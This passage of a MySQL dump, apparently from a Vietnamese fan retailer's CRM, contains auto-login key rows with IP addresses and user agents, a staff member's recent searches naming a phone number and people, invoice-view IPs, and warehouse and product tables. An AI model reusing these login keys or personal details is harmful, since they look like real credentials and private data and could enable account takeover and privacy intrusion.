('c3318eed4239a944113dc752bd2fafed', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36', '42.116.95.18', '2023-07-26 07:16:23', 1),
('47ff4de8adab012d4ba2214a7b408ee1', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36', '113.161.35.100', '2023-07-27 17:39:24', 1),
('867afb5c5be09bc93131718ffcf5baa2', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36', '42.116.95.18', '2023-07-31 02:13:44', 1),
('c38535af066354b3f9ccf55e989273f6', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36', '42.115.247.244', '2023-08-09 06:21:36', 1),
('e0385bb5ae839945f7d3635a988b4a0a', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36', '42.115.247.244', '2023-08-10 22:27:22', 1),
('debea5187ee1dcd28805cca59ac731a1', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36', '42.115.247.244', '2023-08-12 17:19:24', 1),
('132d2e5576686f3394b2dcee6a8cfc4b', 1, 'Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Mobile Safari/537.36', '42.115.247.244', '2023-08-13 08:20:02', 1),
('75e67ad77b4f91d0b50361c4e7b6c137', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.6 Mobile/15E148 Safari/604.1', '104.28.68.168', '2023-08-14 01:08:27', 1),
('48377732cf40db975dcc9bc091356fbb', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36', '42.115.247.244', '2023-08-14 20:47:10', 1),
('84ba4aba090a882926ef5e2705798c67', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36', '42.114.80.125', '2023-08-23 01:54:26', 1),
('88d8d36b046f18e8dc1eb7772c966f10', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/116.0', '42.114.80.125', '2023-08-23 16:32:30', 1),
('0a3e271d24b5eb1397049e19f48d6c5e', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/116.0.5845.118 Mobile/15E148 Safari/604.1', '113.161.35.100', '2023-08-29 21:22:31', 1),
('427c5a2e20f6e9f825f3886a15817816', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36', '42.114.80.125', '2023-08-30 22:17:04', 1),
('9516f9866c1211996ec2c420b4a81348', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/116 Version/11.1.1 Safari/605.1.15', '14.191.82.142', '2023-09-02 06:04:08', 1),
('9921c167000de673cf2b954c55bd94c2', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36', '27.67.46.61', '2023-09-03 08:27:22', 1),
('10dc0db445f66f0380950db2e94dd4b9', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36', '113.161.35.100', '2023-09-13 22:29:46', 1),
('c1ed7d0cbadf234707de22be25b79b9e', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0', '113.161.35.100', '2023-09-26 07:16:25', 1),
('7daa3f43e947f0209d063f0fc749798c', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/117.0.5938.108 Mobile/15E148 Safari/604.1', '113.161.35.100', '2023-09-26 07:56:13', 1),
('71133fc6bbfc87d5ca6f533b01267623', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36', '113.161.35.100', '2023-09-27 19:59:47', 1),
('f78aad6c475e54407c9a81f0b276f16b', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36', '113.161.35.100', '2023-10-03 06:21:37', 1),
('97c12c1e79476400624c264c80fe476c', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36', '113.161.35.100', '2023-10-03 22:06:32', 1),
('340f056fe1144126e07330800f5460e1', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0', '113.161.35.100', '2023-10-05 23:45:23', 1),
('fefce8030d6820adaef95b0cad10a0a4', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36', '113.161.35.100', '2023-10-07 03:06:29', 1),
('ac3d5784408a88237fff3cb507371f99', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36', '113.161.35.100', '2023-10-12 21:16:10', 1),
('c19104061898f5808a5e044a5faa8554', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36', '113.161.35.100', '2023-10-13 02:26:53', 1),
('6d0a585341b41950cef7fda9706ef058', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15', '113.161.35.100', '2023-10-17 09:29:02', 1);
INSERT INTO `tbluser_auto_login` (`key_id`, `user_id`, `user_agent`, `last_ip`, `last_login`, `staff`) VALUES
('c86598b2c5943cd274e869627f325461', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36', '113.161.35.100', '2023-10-23 20:49:13', 1),
('899923ec4e5658f031d9870ad7da48a0', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/116 Version/11.1.1 Safari/605.1.15', '113.23.35.66', '2023-10-30 02:49:37', 1),
('0e3710d2f5923063e7fc4c96c713a8f8', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/118.0', '113.161.35.100', '2023-10-30 06:06:59', 1),
('68fd7aff692f2372287c783cfeb98be0', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36', '113.161.35.100', '2023-10-30 19:41:26', 1),
('64b9b02a9d364fde96d86c805ea81b24', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36', '113.161.35.100', '2023-11-01 00:21:50', 1),
('03b17e22b6663f8c2343615a79b5c2af', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/116 Version/11.1.1 Safari/605.1.15', '171.253.186.231', '2023-11-07 18:12:58', 1),
('e76e752951bad2dbb8c009f456c98f56', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36', '113.161.35.100', '2023-11-11 02:44:18', 1),
('a649d12f729b85375c68c410892d80b2', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36', '113.161.35.100', '2023-11-14 03:18:38', 1),
('601162850d9e400cb8104993afa71583', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0', '113.161.35.100', '2023-11-14 19:54:59', 1),
('51d498ad9b7505c061168af8229963e3', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0', '113.161.35.100', '2023-11-15 20:43:39', 1),
('77765fcb8ddaa42ecfe5755b2573bd05', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0', '113.161.35.100', '2023-11-16 01:59:37', 1),
('b9e344df8d921294184ebe3e93eba57f', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36', '113.161.35.100', '2023-11-20 05:28:09', 1),
('3bbb7d84b37a5b3716b99ae94ff410d5', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 16_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.109 Mobile/15E148 Safari/604.1', '125.235.123.98', '2023-11-20 23:33:45', 1),
('8383a72bc21a66d319896cec40d331a6', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1.1 Safari/605.1.15', '115.77.187.114', '2023-11-23 18:31:38', 1),
('c6e0e36ecefe7c8c665b4ae666250fa4', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0', '113.161.35.100', '2023-11-24 00:13:01', 1),
('650fbfcf9a5d119fe4334e92f21fc4c2', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0', '113.161.35.100', '2023-11-24 00:18:34', 1),
('1650f5b59baad0ec5727790101dc24a5', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/116 Version/11.1.1 Safari/605.1.15', '113.161.35.100', '2023-11-24 18:40:14', 1),
('1773cbd44460f9d40f307eda7fc9b21d', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Edg/119.0.0.0', '113.161.35.100', '2023-11-25 19:23:58', 1),
('a5bb83471e794a57f71559584a991b6b', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/119.0.6045.169 Mobile/15E148 Safari/604.1', '171.253.128.248', '2023-11-30 04:43:43', 1),
('4d43484d5bb8fb57ec8eac572b9a2629', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', '113.161.35.100', '2023-12-09 19:48:06', 1),
('481d8ed2365571c1a8c7e7ae0a58bc4f', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', '113.161.35.100', '2023-12-18 02:13:08', 1),
('1b7e63daa6b44fc546c938cf5b16ce0b', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0', '113.161.35.100', '2023-12-21 00:39:25', 1),
('c40d06f2f579879cb57ce22fc4be3803', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1', '113.185.75.180', '2023-12-24 02:35:09', 1),
('2a42c979de6e05567921ed71725abfa8', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', '113.161.35.100', '2023-12-29 19:13:41', 1),
('817cc24a30deeb6e5938db4e9c7ec21f', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', '113.161.35.100', '2024-01-17 00:18:03', 1),
('b8209f588021931cea4baea7f9194802', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36', '113.161.35.100', '2024-01-18 02:39:32', 1),
('456ccca864cdefe35bd48a29b834fc72', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', '113.161.35.100', '2024-01-19 00:42:23', 1),
('41600a4b278c82efc5a74b8923db27d2', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_5) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/120 Version/11.1.1 Safari/605.1.15', '113.161.35.100', '2024-01-22 18:01:01', 1),
('f0cf8e15436347bec2066d08a2a18e35', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0', '113.161.35.100', '2024-01-22 21:47:39', 1),
('ed03c262d3636d5e29cc14c8d50586ae', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:121.0) Gecko/20100101 Firefox/121.0', '113.161.35.100', '2024-01-22 23:38:32', 1),
('1d7e56befda5326b2d3139eaf4d7d22c', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36', '113.161.35.100', '2024-01-23 01:07:19', 1),
('f507d62a443ebf8a5186a84f0f2a4225', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0', '113.161.35.100', '2024-01-23 20:24:53', 1),
('bb1eadc2f9794211656af9a7546e6282', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0', '113.161.35.100', '2024-01-26 00:22:25', 1),
('ee73e6d9a23806d0d76019c191748ffa', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0', '113.161.35.100', '2024-01-26 08:48:27', 1),
('db74f849247908b24175d0f7e04dc5e9', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0', '113.161.35.100', '2024-01-28 21:40:07', 1),
('7d9194f20ef330b44bc12273f70147b2', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0', '113.161.35.100', '2024-01-28 23:57:46', 1),
('70feb18c7399f0a0ab5d5ab19d3ae9f2', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0', '113.161.35.100', '2024-01-29 17:18:53', 1),
('2b9e81a1ad3578f43c7508c9a17e37eb', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0', '113.161.35.100', '2024-02-23 19:34:26', 1),
('38fa1f2bb1cca66710086af245ad0413', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36', '113.161.35.100', '2024-02-26 07:17:22', 1),
('c3ac37e2fbc613931c7fb142f41e00a3', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36', '113.161.35.100', '2024-02-27 00:58:09', 1),
('e1cd48198322ef5cfdbe27afdaf6b34c', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0', '113.161.35.100', '2024-02-27 21:32:08', 1),
('aef36c6791d4262c88b06497e1abb7a7', 1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0', '113.161.35.100', '2024-02-27 23:38:59', 1),
('96eae06b88d4b94d9114d3dffc9eee77', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36', '113.161.35.100', '2024-03-04 02:52:26', 1),
('f55f7e81d32af79cb900ea36f6581e94', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.3.1 Mobile/15E148 Safari/604.1', '104.28.68.152', '2024-03-04 23:32:42', 1),
('4d23011e9c2359f11e22941db6af3daa', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', '113.161.35.100', '2024-03-04 23:35:21', 1),
('f35470f5ef98d3ade6c0120ac44370fc', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', '113.161.35.100', '2024-03-05 02:24:55', 1),
('6b45a32426cdb5039148fd86982186ad', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0', '113.161.35.100', '2024-03-05 02:39:05', 1),
('6cf5f2aeb2fa9e6285de9cbca81ca581', 1, 'Mozilla/5.0 (iPhone; CPU iPhone OS 17_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) CriOS/122.0.6261.89 Mobile/15E148 Safari/604.1', '113.161.35.100', '2024-03-09 09:03:04', 1),
('3710f720fb3d783e044310c6fadf943b', 1, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36', '127.0.0.1', '2024-06-12 09:22:59', 1);

-- --------------------------------------------------------

--
-- Table structure for table `tbluser_meta`
--

CREATE TABLE `tbluser_meta` (
  `umeta_id` bigint(20) UNSIGNED NOT NULL,
  `staff_id` bigint(20) UNSIGNED NOT NULL DEFAULT 0,
  `client_id` bigint(20) UNSIGNED NOT NULL DEFAULT 0,
  `contact_id` bigint(20) UNSIGNED NOT NULL DEFAULT 0,
  `meta_key` varchar(191) DEFAULT NULL,
  `meta_value` longtext DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tbluser_meta`
--

INSERT INTO `tbluser_meta` (`umeta_id`, `staff_id`, `client_id`, `contact_id`, `meta_key`, `meta_value`) VALUES
(3, 1, 0, 0, 'recent_searches', '[\"0916640015\",\"Phu Cuong\",\"Nguyen Phu Cuong\",\"cuong\",\"nhien\"]'),
(4, 1, 0, 0, 'appointly_show_summary', '0'),
(5, 1, 0, 0, 'appointly_default_table_filter', 'all'),
(17, 1, 0, 0, 'dashboard_widgets_visibility', NULL),
(18, 1, 0, 0, 'dashboard_widgets_order', NULL),
(53, 1, 0, 0, 'proposals-relation-table-last-order', '[[6,\"desc\"]]'),
(54, 1, 0, 0, 'expenses-table-last-order', '[[6,\"desc\"]]'),
(55, 1, 0, 0, 'contracts-table-last-order', '[[6,\"desc\"]]'),
(56, 1, 0, 0, 'tasks-table-last-order', '[[3,\"asc\"]]'),
(57, 1, 0, 0, 'customers-table-last-order', '[[1,\"desc\"]]'),
(58, 1, 0, 0, 'subscriptions-table-last-order', '[[6,\"desc\"]]'),
(59, 1, 0, 0, 'reminder-table-last-order', '[[6,\"asc\"]]'),
(60, 1, 0, 0, 'projects-table-last-order', '[[1,\"desc\"]]'),
(61, 1, 0, 0, 'leads-table-last-order', '[[0,\"asc\"]]'),
(62, 1, 0, 0, 'proposals-table-last-order', '[[7,\"desc\"]]'),
(63, 1, 0, 0, 'payments-table-last-order', '[[0,\"desc\"]]'),
(85, 1, 0, 0, 'tickets-table-last-order', '[[10,\"desc\"]]'),
(86, 1, 0, 0, 'table_item_list-table-last-order', '[[1,\"desc\"]]'),
(119, 1, 0, 0, 'my-projects-table-last-order', '[[2,\"asc\"]]'),
(120, 1, 0, 0, 'sales-table-last-order', '[[1,\"desc\"]]'),
(121, 1, 0, 0, 'table-vendor-items-table-last-order', '[[1,\"desc\"]]'),
(122, 1, 0, 0, 'vendors-table-last-order', '[[1,\"desc\"]]'),
(125, 1, 0, 0, 'kb-articles-table-last-order', '[[2,\"desc\"]]'),
(129, 1, 0, 0, 'table_commodity_list-table-last-order', '[[6,\"desc\"]]'),
(130, 1, 0, 0, 'table_warehouse_name-table-last-order', '[[3,\"asc\"]]');

-- --------------------------------------------------------

--
-- Table structure for table `tblvault`
--

CREATE TABLE `tblvault` (
  `id` int(11) NOT NULL,
  `customer_id` int(11) NOT NULL,
  `server_address` varchar(191) NOT NULL,
  `port` int(11) DEFAULT NULL,
  `username` varchar(191) NOT NULL,
  `password` text NOT NULL,
  `description` text DEFAULT NULL,
  `creator` int(11) NOT NULL,
  `creator_name` varchar(100) DEFAULT NULL,
  `visibility` tinyint(1) NOT NULL DEFAULT 1,
  `share_in_projects` tinyint(1) NOT NULL DEFAULT 0,
  `last_updated` datetime DEFAULT NULL,
  `last_updated_from` varchar(100) DEFAULT NULL,
  `date_created` datetime NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblviews_tracking`
--

CREATE TABLE `tblviews_tracking` (
  `id` int(11) NOT NULL,
  `rel_id` int(11) NOT NULL,
  `rel_type` varchar(40) NOT NULL,
  `date` datetime NOT NULL,
  `view_ip` varchar(40) NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblviews_tracking`
--

INSERT INTO `tblviews_tracking` (`id`, `rel_id`, `rel_type`, `date`, `view_ip`) VALUES
(1, 1, 'estimate', '2022-01-09 09:28:12', '112.197.13.72'),
(2, 1, 'estimate', '2022-01-09 20:35:57', '42.116.209.103'),
(3, 5, 'invoice', '2022-01-14 14:54:34', '112.197.13.69'),
(5, 16, 'estimate', '2022-02-25 08:32:07', '125.235.188.97'),
(6, 33, 'invoice', '2022-02-27 21:14:31', '42.119.42.13'),
(7, 67, 'invoice', '2022-04-05 20:35:43', '112.197.5.196'),
(8, 78, 'invoice', '2022-04-07 14:22:07', '171.231.190.47'),
(9, 78, 'invoice', '2022-04-08 16:35:40', '27.66.51.178'),
(10, 71, 'invoice', '2022-04-11 15:28:35', '42.115.238.127'),
(11, 37, 'estimate', '2022-04-11 16:08:00', '42.115.238.127'),
(12, 37, 'estimate', '2022-04-13 08:50:28', '103.199.70.133'),
(13, 67, 'invoice', '2022-05-08 09:42:14', '27.2.226.68'),
(14, 57, 'estimate', '2022-05-12 10:06:15', '113.185.72.86'),
(15, 57, 'estimate', '2022-05-12 10:06:15', '113.185.72.86'),
(16, 57, 'estimate', '2022-05-12 11:09:14', '115.74.118.39'),
(17, 67, 'invoice', '2022-06-14 09:43:37', '183.91.188.229'),
(18, 89, 'invoice', '2022-06-16 11:47:52', '27.2.226.69'),
(19, 110, 'invoice', '2022-06-16 11:48:07', '27.2.226.73'),
(20, 106, 'invoice', '2022-06-16 11:48:48', '112.197.8.70'),
(21, 111, 'invoice', '2022-06-18 15:28:56', '112.197.13.69'),
(22, 101, 'invoice', '2022-06-27 14:50:27', '171.253.33.107'),
(23, 120, 'invoice', '2022-06-27 15:34:23', '171.253.33.107'),
(24, 84, 'invoice', '2022-06-30 18:35:05', '202.60.105.229'),
(25, 123, 'invoice', '2022-07-25 10:05:05', '42.117.10.70');

-- --------------------------------------------------------

--
-- Table structure for table `tblwarehouse`
--

CREATE TABLE `tblwarehouse` (
  `warehouse_id` int(10) UNSIGNED NOT NULL,
  `warehouse_code` varchar(100) DEFAULT NULL,
  `warehouse_name` text DEFAULT NULL,
  `warehouse_address` text DEFAULT NULL,
  `order` int(11) DEFAULT NULL,
  `display` int(11) DEFAULT NULL COMMENT 'display 1: display (yes)  0: not displayed (no)',
  `note` text DEFAULT NULL,
  `city` text DEFAULT NULL,
  `state` text DEFAULT NULL,
  `zip_code` text DEFAULT NULL,
  `country` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblwarehouse`
--

INSERT INTO `tblwarehouse` (`warehouse_id`, `warehouse_code`, `warehouse_name`, `warehouse_address`, `order`, `display`, `note`, `city`, `state`, `zip_code`, `country`) VALUES
(1, 'KHO-THANHMYLOI', 'KHO-TML', '304 TVB', 0, 1, '0', '', '', '', '243');

-- --------------------------------------------------------

--
-- Table structure for table `tblware_body_type`
--

CREATE TABLE `tblware_body_type` (
  `body_type_id` int(10) UNSIGNED NOT NULL,
  `body_code` varchar(100) DEFAULT NULL,
  `body_name` text DEFAULT NULL,
  `order` int(11) DEFAULT NULL,
  `display` int(11) DEFAULT NULL COMMENT 'display 1: display (yes)  0: not displayed (no)',
  `note` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblware_body_type`
--

INSERT INTO `tblware_body_type` (`body_type_id`, `body_code`, `body_name`, `order`, `display`, `note`) VALUES
(1, 'CL1', 'Quạt trần', 0, 1, '0'),
(2, 'CL2', 'Quạt công nghiệp', 0, 1, '0'),
(3, 'CL3', 'Quạt điều hòa', 0, 1, '0'),
(4, 'CL4', 'Quạt trần công nghiệp', 0, 1, '0'),
(5, 'CL5', 'Quạt HVLS', 0, 1, '0');

-- --------------------------------------------------------

--
-- Table structure for table `tblware_color`
--

CREATE TABLE `tblware_color` (
  `color_id` int(10) UNSIGNED NOT NULL,
  `color_code` varchar(100) DEFAULT NULL,
  `color_name` varchar(100) DEFAULT NULL,
  `color_hex` text DEFAULT NULL,
  `order` int(11) DEFAULT NULL,
  `display` int(11) DEFAULT NULL COMMENT 'display 1: display (yes)  0: not displayed (no)',
  `note` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblware_color`
--

INSERT INTO `tblware_color` (`color_id`, `color_code`, `color_name`, `color_hex`, `order`, `display`, `note`) VALUES
(1, '', 'Dark Walnut', '', 1, 1, ''),
(2, '', 'Maple Wood', '', 1, 1, ''),
(3, '', 'Black', '', 1, 1, ''),
(4, '', 'White', '', 1, 1, ''),
(5, '', 'Sliver/Black', '', 1, 1, ''),
(6, '', 'Caramel Bamboo', '', 1, 1, ''),
(7, '', 'Cocoa Bamboo', '', 1, 1, ''),
(8, '', 'Brushed Nickel', '', 1, 1, '');

-- --------------------------------------------------------

--
-- Table structure for table `tblware_commodity_type`
--

CREATE TABLE `tblware_commodity_type` (
  `commodity_type_id` int(10) UNSIGNED NOT NULL,
  `commondity_code` varchar(100) DEFAULT NULL,
  `commondity_name` text DEFAULT NULL,
  `order` int(11) DEFAULT NULL,
  `display` int(11) DEFAULT NULL COMMENT 'display 1: display (yes)  0: not displayed (no)',
  `note` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

--
-- Dumping data for table `tblware_commodity_type`
--

INSERT INTO `tblware_commodity_type` (`commodity_type_id`, `commondity_code`, `commondity_name`, `order`, `display`, `note`) VALUES
(1, 'LO1', 'Quạt mát', 0, 1, '0'),
(2, 'LO2', 'Quạt mát khử khuẩn', 0, 1, '0'),
(3, 'LO3', 'Quạt thổi', 0, 1, '0');

-- --------------------------------------------------------

--
-- Table structure for table `tblware_size_type`
--

CREATE TABLE `tblware_size_type` (
  `size_type_id` int(10) UNSIGNED NOT NULL,
  `size_code` varchar(100) DEFAULT NULL,
  `size_name` text DEFAULT NULL,
  `size_symbol` text DEFAULT NULL,
  `order` int(11) DEFAULT NULL,
  `display` int(11) DEFAULT NULL COMMENT 'display 1: display (yes)  0: not displayed (no)',
  `note` text DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;

-- --------------------------------------------------------

--
-- Table structure for table `tblware_style_type`
--

CREATE TABLE `tblware_style_type` (
  `style_type_id` int(10) UNSIGNED NOT NULL,
  `style_code` varchar(100) DEFAULT NULL,
  `style_barcode` text DEFAULT NULL,
  `style_name` text DEFAULT NULL,
  `order` int(11) DEFAULT NULL,
  `display` int(11) DEFAULT NULL COMMENT 'display 1: display (yes)  0: not displayed (no)',
  `note` text DEFAULT NULL
